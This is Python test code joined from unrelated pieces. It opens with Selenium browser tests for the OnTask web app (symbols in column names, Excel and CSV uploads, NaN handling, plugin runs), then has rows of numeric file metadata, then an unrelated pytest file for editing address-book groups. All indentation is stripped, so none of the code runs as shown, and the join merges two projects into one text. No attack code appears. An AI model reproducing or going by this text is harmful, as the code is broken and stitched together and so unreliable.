Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text(symbols + "2")
self.selenium.find_element_by_name("builder_rule_0_operator").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_operator")).select_by_visible_text(
"doesn't begin with")
self.selenium.find_element_by_name("builder_rule_0_value_0").click()
self.selenium.find_element_by_name("builder_rule_0_value_0").clear()
self.selenium.find_element_by_name("builder_rule_0_value_0").send_keys(
"x")
# Save the filter
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]").click()
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for page to reload
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//h4[@id='filter-set']/div/button")
)
)
# Click the preview button
self.selenium.find_element_by_xpath(
"//div[@id='html-editor']/form/div[3]/button").click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable((By.CLASS_NAME, 'js-action-preview-nxt'))
)
# Certain name should be in the page now.
self.assertIn('Carmelo Coton', self.selenium.page_source)
# Click in the "Close" button
self.selenium.find_element_by_xpath(
"//div[@id='modal-item']/div/div/div/div[2]/button[2]").click()
# End of session
self.logout()
def test_02_symbols(self):
symbols = r'!#$%&()*+,-./:;<=>?@[\]^_`{|}~'  # raw string keeps the backslash literal
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('sss')
wf_link.click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Select the email column and click in the edit button
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[3]/td[5]/div/button"
).click()
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[3]/td[5]/div/ul/li[1]/button"
).click()
# Wait for the form to create the derived column
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Edit column')
)
# Append symbols to the name
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
# Save column information
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
self.wait_close_modal_refresh_table('column-table_previous')
# Select the age column and click in the edit button
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[4]/td[5]/div/button"
).click()
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[4]/td[5]/div/ul/li[1]/button"
).click()
# Wait for the modal to open
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Edit column')
)
# Append symbols to the name
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
# Save column information
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
self.wait_close_modal_refresh_table('column-table_previous')
# Go to the table link
self.selenium.find_element_by_link_text("Table").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'table-data_previous'))
)
# Verify that everything appears normally
self.assertIn(escape(symbols), self.selenium.page_source)
self.assertIn('<td class=" dt-center">12</td>',
self.selenium.page_source)
self.assertIn('<td class=" dt-center">12.1</td>',
self.selenium.page_source)
self.assertIn('<td class=" dt-center">13.2</td>',
self.selenium.page_source)
# Go to the actions page
self.selenium.find_element_by_link_text("Actions").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Edit the action-in at the top of the table
self.selenium.find_element_by_link_text("Edit").click()
# Set the correct values for an action-in
# Set the right columns to process
select = Select(self.selenium.find_element_by_id(
'select-key-column-name'))
select.select_by_visible_text('email')
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable((By.CLASS_NAME,
'js-workflow-column-edit'))
)
# Done editing the action in
self.selenium.find_element_by_link_text('Done').click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Click in the run link
self.selenium.find_element_by_link_text("Run").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Click on the first value
self.selenium.find_element_by_link_text("student1@bogus.com").click()
# Modify the value of the column
self.selenium.find_element_by_id("id____ontask___select_1").click()
self.selenium.find_element_by_id("id____ontask___select_1").clear()
self.selenium.find_element_by_id("id____ontask___select_1").send_keys(
"14"
)
# Submit changes to the first element
self.selenium.find_element_by_xpath(
"(//button[@name='submit'])[1]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Click on the second value
self.selenium.find_element_by_link_text("student2@bogus.com").click()
# Modify the value of the column
self.selenium.find_element_by_id("id____ontask___select_1").clear()
self.selenium.find_element_by_id(
"id____ontask___select_1"
).send_keys("15")
# Submit changes to the second element
self.selenium.find_element_by_xpath(
"(//button[@name='submit'])[1]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Click on the third value
self.selenium.find_element_by_link_text("student3@bogus.com").click()
# Modify the value of the column
self.selenium.find_element_by_id("id____ontask___select_1").click()
self.selenium.find_element_by_id("id____ontask___select_1").clear()
self.selenium.find_element_by_id(
"id____ontask___select_1"
).send_keys("16")
# Submit changes to the third element
self.selenium.find_element_by_xpath(
"(//button[@name='submit'])[1]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Click in the back link!
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]"
).click()
# Wait for page to refresh
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Go to the table page
self.selenium.find_element_by_link_text("Table").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'table-data_previous'))
)
# Assert the new values
self.assertIn('<td class=" dt-center">14</td>',
self.selenium.page_source)
self.assertIn('<td class=" dt-center">15</td>',
self.selenium.page_source)
self.assertIn('<td class=" dt-center">16</td>',
self.selenium.page_source)
# End of session
self.logout()
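# The tests above repeat the same wait pattern: block until the Bootstrap
# modal closes, then until the DataTables paging widget is present again.
# A minimal sketch of a reusable helper in that spirit (the name and exact
# behaviour of wait_close_modal_refresh_table are assumed, not shown here):
def wait_modal_close_then_table(driver, paging_widget_id, timeout=10):
    # First wait for the 'modal-open' marker class to disappear.
    WebDriverWait(driver, timeout).until_not(
        EC.presence_of_element_located((By.CLASS_NAME, 'modal-open'))
    )
    # Then wait for the table's paging widget to be rendered again.
    WebDriverWait(driver, timeout).until(
        EC.presence_of_element_located((By.ID, paging_widget_id))
    )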
class DataopsExcelUpload(test.OntaskLiveTestCase):
fixtures = ['empty_wflow']
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsExcelUpload, self).tearDown()
def test_01_excelupload(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('wflow1')
wf_link.click()
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Data Upload/Merge").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Data Upload/Merge')
)
self.selenium.find_element_by_link_text("Excel Upload/Merge").click()
self.selenium.find_element_by_id("id_file").send_keys(
os.path.join(settings.BASE_DIR(),
'dataops',
'fixtures',
'excel_upload.xlsx')
)
self.selenium.find_element_by_id("id_sheet").click()
self.selenium.find_element_by_id("id_sheet").clear()
self.selenium.find_element_by_id("id_sheet").send_keys("results")
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.ID, 'checkAll'))
)
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Details')
)
# The number of rows must be 29
wflow = Workflow.objects.all()[0]
self.assertEqual(wflow.nrows, 29)
self.assertEqual(wflow.ncols, 14)
# End of session
self.logout()
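# The expected shape (29 rows, 14 columns) comes from the 'results' sheet of
# the fixture workbook. A quick sanity check outside the browser, assuming
# pandas is available (as it is elsewhere in this project):
# import pandas as pd
# pd.read_excel(os.path.join(settings.BASE_DIR(), 'dataops', 'fixtures',
#               'excel_upload.xlsx'), sheet_name='results').shape  # (29, 14)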
class DataopsExcelUploadSheet(test.OntaskLiveTestCase):
fixtures = ['empty_wflow']
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsExcelUploadSheet, self).tearDown()
def test_01_excelupload_sheet(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('wflow1')
wf_link.click()
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Data Upload/Merge").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Data Upload/Merge')
)
self.selenium.find_element_by_link_text("Excel Upload/Merge").click()
self.selenium.find_element_by_id("id_file").send_keys(
os.path.join(settings.BASE_DIR(),
'dataops',
'fixtures',
'excel_upload.xlsx')
)
self.selenium.find_element_by_id("id_sheet").click()
self.selenium.find_element_by_id("id_sheet").clear()
self.selenium.find_element_by_id("id_sheet").send_keys("second sheet")
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.ID, 'checkAll'))
)
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Details')
)
# The number of rows must be 19
wflow = Workflow.objects.all()[0]
self.assertEqual(wflow.nrows, 19)
self.assertEqual(wflow.ncols, 14)
# End of session
self.logout()
class DataopsNaNProcessing(test.OntaskLiveTestCase):
fixtures = ['empty_wflow']
action_text = "Bool1 = {{ bool1 }}\\n" + \
"Bool2 = {{ bool2 }}\\n" + \
"Bool3 = {{ bool3 }}\\n" + \
"{% if bool1 cond %}Bool 1 is true{% endif %}\\n" + \
"{% if bool2 cond %}Bool 2 is true{% endif %}\\n" + \
"{% if bool3 cond %}Bool 3 is true{% endif %}\\n"
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsNaNProcessing, self).tearDown()
def test_01_nan_manipulation(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# Create new workflow
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'id_name'))
)
# Insert name and click create
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("NaN")
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
# Wait for details page
WebDriverWait(self.selenium, 20).until(
EC.title_is('OnTask :: Details')
)
# Open the Dataops page
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Data Upload/Merge").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Data Upload/Merge')
)
# Start the upload process: Select upload
self.selenium.find_element_by_link_text("CSV Upload/Merge").click()
# Select file and upload
self.selenium.find_element_by_id("id_file").send_keys(
os.path.join(settings.BASE_DIR(),
'dataops',
'fixtures',
'test_df_merge_update_df1.csv')
)
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'page-header'),
'Step 2: Select Columns')
)
# Submit
self.selenium.find_element_by_xpath(
"(//button[@name='Submit'])[2]"
).click()
# Wait for the upload/merge
WebDriverWait(self.selenium, 20).until(
EC.title_is('OnTask :: Details')
)
# Select again the upload/merge function
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Data Upload/Merge").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Data Upload/Merge')
)
self.selenium.find_element_by_link_text("CSV Upload/Merge").click()
# Select the second file and submit
self.selenium.find_element_by_id("id_file").send_keys(
os.path.join(settings.BASE_DIR(),
'dataops',
'fixtures',
'test_df_merge_update_df2.csv')
)
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'page-header'),
'Step 2: Select Columns')
)
# Select all the columns for upload
self.selenium.find_element_by_name("Submit").click()
# Wait for the upload/merge
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.CLASS_NAME, 'page-header'),
'Step 3: Select Keys and Merge Option')
)
# Choose the default options for the merge (key and outer)
# Select the merger function type
select = Select(self.selenium.find_element_by_id('id_how_merge'))
select.select_by_value('outer')
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.CLASS_NAME, 'page-header'),
'Step 4: Review and confirm')
)
# Check the merge summary and proceed
self.selenium.find_element_by_name("Submit").click()
# Wait for the upload/merge to finish
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'page-header'),
'Workflow Details')
)
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.CLASS_NAME, 'success'))
)
# Go to the actions page
self.selenium.find_element_by_link_text("Actions").click()
# Create a new action
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'id_name'))
)
# Type action name and click complete to edit
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("action out")
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//h4[@id='filter-set']/div/button")
)
)
# Create the first condition.
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]"
).click()
# Wait for the form to appear
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Create condition')
)
# Add name and condition
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("bool1 cond")
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text("bool1")
# Wait for the select elements to be clickable
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//input[@name='builder_rule_0_value_0']")
)
)
self.selenium.find_element_by_xpath(
"(//input[@name='builder_rule_0_value_0'])[2]").click()
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]"
).click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for page to refresh
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.CLASS_NAME, 'js-condition-edit')
)
)
# Create the second condition
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]"
).click()
# Wait for the form to appear
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Create condition')
)
# Add name and condition
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("bool2 cond")
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text("bool2")
# Wait for the select elements to be clickable
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//input[@name='builder_rule_0_value_0']")
)
)
self.selenium.find_element_by_xpath(
"(//input[@name='builder_rule_0_value_0'])[2]").click()
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]"
).click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for page to refresh
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.CLASS_NAME, 'js-condition-edit')
)
)
# Create the third condition
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]"
).click()
# Wait for the form to appear
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Create condition')
)
# Add name and condition
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("bool3 cond")
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text("bool3")
# Wait for the select elements to be clickable
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//input[@name='builder_rule_0_value_0']")
)
)
self.selenium.find_element_by_xpath(
"(//input[@name='builder_rule_0_value_0'])[2]").click()
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]").click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for page to refresh
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.CLASS_NAME, 'js-condition-edit')
)
)
# insert the action text
self.selenium.execute_script(
"""$('#id_content').summernote('editor.insertText',
"{0}");""".format(self.action_text)
)
# Click in the preview and circle around the 12 rows
self.selenium.find_element_by_xpath(
"//button[contains(@class, 'js-action-preview')]").click()
# Wait for the modal to appear
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/div/div/h4"),
'Action Preview 1')
)
for _ in range(11):
self.selenium.find_element_by_xpath(
"//div[@id='modal-item']/div/div/div/div[2]/button[3]/span"
).click()
# End of session
self.logout()
class DataopsPluginExecution(test.OntaskLiveTestCase):
fixtures = ['plugin_execution']
filename = os.path.join(
settings.BASE_DIR(),
'dataops',
'fixtures',
'plugin_execution.sql'
)
def setUp(self):
super(DataopsPluginExecution, self).setUp()
pandas_db.pg_restore_table(self.filename)
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsPluginExecution, self).tearDown()
def test_01_first_plugin(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('Plugin test')
wf_link.click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Open the transform page
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Transform").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'transform-table_previous'))
)
# Click in the first plugin
self.selenium.find_element_by_link_text("Run").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.NAME, 'csrfmiddlewaretoken'))
)
# Provide the execution data
self.selenium.find_element_by_xpath("//input[@type='text']").click()
self.selenium.find_element_by_name("columns").click()
self.selenium.find_element_by_xpath(
"(//input[@name='columns'])[2]"
).click()
# Click outside the SOL widget
self.selenium.find_element_by_class_name(
'sol-current-selection'
).click()
self.selenium.find_element_by_id("id_merge_key").click()
Select(self.selenium.find_element_by_id(
"id_merge_key"
)).select_by_visible_text("email")
# Submit the execution
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'plugin-execution-report'))
)
# Done. Click continue.
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Assert the content of the dataframe
wflow = Workflow.objects.get(name='Plugin test')
df = pandas_db.load_from_db(wflow.id)
self.assertTrue('RESULT 1' in set(df.columns))
self.assertTrue('RESULT 2' in set(df.columns))
self.assertTrue(all([x == 1 for x in df['RESULT 1']]))
self.assertTrue(all([x == 2 for x in df['RESULT 2']]))
# Second execution, this time adding a suffix to the column
# Open the transform page
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Transform").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'transform-table_previous'))
)
# Click in the first plugin
self.selenium.find_element_by_link_text("Run").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.NAME, 'csrfmiddlewaretoken'))
)
# Provide the execution data
self.selenium.find_element_by_xpath("//input[@type='text']").click()
self.selenium.find_element_by_name("columns").click()
self.selenium.find_element_by_xpath(
"(//input[@name='columns'])[2]"
).click()
# Click outside the SOL widget
self.selenium.find_element_by_class_name(
'sol-current-selection'
).click()
self.selenium.find_element_by_id("id_merge_key").click()
Select(self.selenium.find_element_by_id(
"id_merge_key"
)).select_by_visible_text("email")
# Put the suffix _2
self.selenium.find_element_by_id("id_out_column_suffix").click()
self.selenium.find_element_by_id("id_out_column_suffix").clear()
self.selenium.find_element_by_id("id_out_column_suffix").send_keys("_2")
# Submit the execution
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'plugin-execution-report'))
)
# Done. Click continue.
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Assert the content of the dataframe
wflow = Workflow.objects.get(name='Plugin test')
df = pandas_db.load_from_db(wflow.id)
self.assertTrue('RESULT 1_2' in set(df.columns))
self.assertTrue('RESULT 2_2' in set(df.columns))
self.assertTrue(all([x == 1 for x in df['RESULT 1_2']]))
self.assertTrue(all([x == 2 for x in df['RESULT 2_2']]))
# End of session
self.logout()
def test_02_second_plugin(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('Plugin test')
wf_link.click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Open the transform page
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Transform").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'transform-table_previous'))
)
# Click in the second plugin
self.selenium.find_element_by_xpath(
"//table[@id='transform-table']/tbody/tr[2]/td[7]/div/a"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.NAME, 'csrfmiddlewaretoken'))
)
# Provide the execution data
self.selenium.find_element_by_id("id_merge_key").click()
Select(self.selenium.find_element_by_id(
"id_merge_key"
)).select_by_visible_text("email")
# Submit the execution
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'plugin-execution-report'))
)
# Done. Click continue.
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Assert the content of the dataframe
wflow = Workflow.objects.get(name='Plugin test')
df = pandas_db.load_from_db(wflow.id)
self.assertTrue('RESULT 3' in set(df.columns))
self.assertTrue('RESULT 4' in set(df.columns))
self.assertTrue(df['RESULT 3'].equals(df['A1'] + df['A2']))
self.assertTrue(df['RESULT 4'].equals(df['A1'] - df['A2']))
# End of session
self.logout()
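# The assertions above imply the plugin contract these tests rely on: a
# plugin adds result columns (optionally suffixed) that are merged back into
# the workflow dataframe on the chosen key. A hypothetical minimal plugin in
# that spirit (the actual plugin API is assumed, not shown in this file):
# class MinimalPlugin(object):
#     def run(self, df, merge_key, suffix=''):
#         df['RESULT 1' + suffix] = 1
#         df['RESULT 2' + suffix] = 2
#         return df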
| 39.524618
| 80
| 0.616817
| 5,698
| 46,560
| 4.765883
| 0.061074
| 0.147592
| 0.130211
| 0.187178
| 0.886876
| 0.872257
| 0.857195
| 0.845854
| 0.816983
| 0.797209
| 0
| 0.012306
| 0.258247
| 46,560
| 1,177
| 81
| 39.558199
| 0.774004
| 0.102298
| 0
| 0.687799
| 0
| 0.013158
| 0.188937
| 0.108081
| 0
| 0
| 0
| 0
| 0.046651
| 1
| 0.016746
| false
| 0
| 0.021531
| 0
| 0.053828
| 0.001196
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d61423b02a0349218f2fd6cfe6434e4146b9fcd3
| 5,925
|
py
|
Python
|
test/test_edit_group.py
|
elaginm/python_training
|
b0d76d3eac93d90401b6b3a137d3dc9a8caa8a5f
|
[
"Apache-2.0"
] | null | null | null |
test/test_edit_group.py
|
elaginm/python_training
|
b0d76d3eac93d90401b6b3a137d3dc9a8caa8a5f
|
[
"Apache-2.0"
] | null | null | null |
test/test_edit_group.py
|
elaginm/python_training
|
b0d76d3eac93d90401b6b3a137d3dc9a8caa8a5f
|
[
"Apache-2.0"
] | null | null | null |
from model.group import Group
import random
import pytest
def test_edit_name(app, db, check_ui):
with pytest.allure.step('Given a non-empty group list'):
old_groups = db.get_group_list()
group = Group(name="New group")
if app.group.count() == 0:
app.group.create(Group(name="Test group"))
app.group.edit_first_group(group)
app.group.delete_first_group()
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
else:
random_group_index = random.randrange(len(old_groups))
group.id = old_groups[random_group_index].id
with pytest.allure.step('I modify the group %s in the list' % group):
app.group.edit_group_by_id(group.id, group)
with pytest.allure.step('the new group list is equal to the old list with the modified group'):
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[random_group_index] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
with pytest.allure.step('check UI'):
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
# random_group = random.choice(old_groups)
# group.id = random_group.id
# app.group.edit_group_by_id(group.id, group)
# new_groups = db.get_group_list()
# assert len(old_groups) == len(new_groups)
# result = re.match('^[^:]*', str(random_group))
# id = result.group(0)
# index_group = None
# i = 0
# while index_group is None and i in range(len(old_groups)):
# result_old_group = re.match('^[^:]*', str(old_groups[i]))
# id_old_group = result_old_group.group(0)
# if (int(id_old_group) == int(id)):
# index_group = i
# i+=1
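# The assertions above sort with key=Group.id_or_max. A plausible sketch of
# that helper (assumed; it is defined on the Group model, not in this file):
# sort by numeric id when one is present, otherwise push the group last.
import sys

def id_or_max_sketch(group):
    # Hypothetical stand-in for Group.id_or_max.
    return int(group.id) if group.id else sys.maxsize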
def test_edit_empty_name(app, db, check_ui):
with pytest.allure.step('Given a non-empty group list'):
old_groups = db.get_group_list()
group = Group(name="Test")
if app.group.count() == 0:
app.group.create(Group(name=""))
app.group.edit_first_group(group)
app.group.delete_first_group()
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
else:
random_group_index = random.randrange(len(old_groups))
group.id = old_groups[random_group_index].id
with pytest.allure.step('I modify the group with id=%s in the list' % group.id):
if app.group.empty_name(group.id):
app.open_home_page()
else:
app.group.edit_group_by_id(group.id, group)
with pytest.allure.step('the new group list is equal to the old list with the modified group'):
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[random_group_index] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
with pytest.allure.step('check UI'):
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(),
key=Group.id_or_max)
def test_edit_non_empty_name(app, db, check_ui):
with pytest.allure.step('Given a non-empty group list'):
old_groups = db.get_group_list()
group = Group(name="")
if app.group.count() == 0:
app.group.create(Group(name="Users"))
app.group.edit_first_group(group)
app.group.delete_first_group()
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
else:
random_group_index = random.randrange(len(old_groups))
group.id = old_groups[random_group_index].id
with pytest.allure.step('I modify the group %s in the list' % group):
if app.group.empty_name(group.id):
app.group.edit_group_by_id(group.id, group)
with pytest.allure.step('the new group list is equal to the old list with the modified group'):
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[random_group_index] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
with pytest.allure.step('check UI'):
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
# test with an index (kept for reference)
# def test_edit_non_empty_name(app):
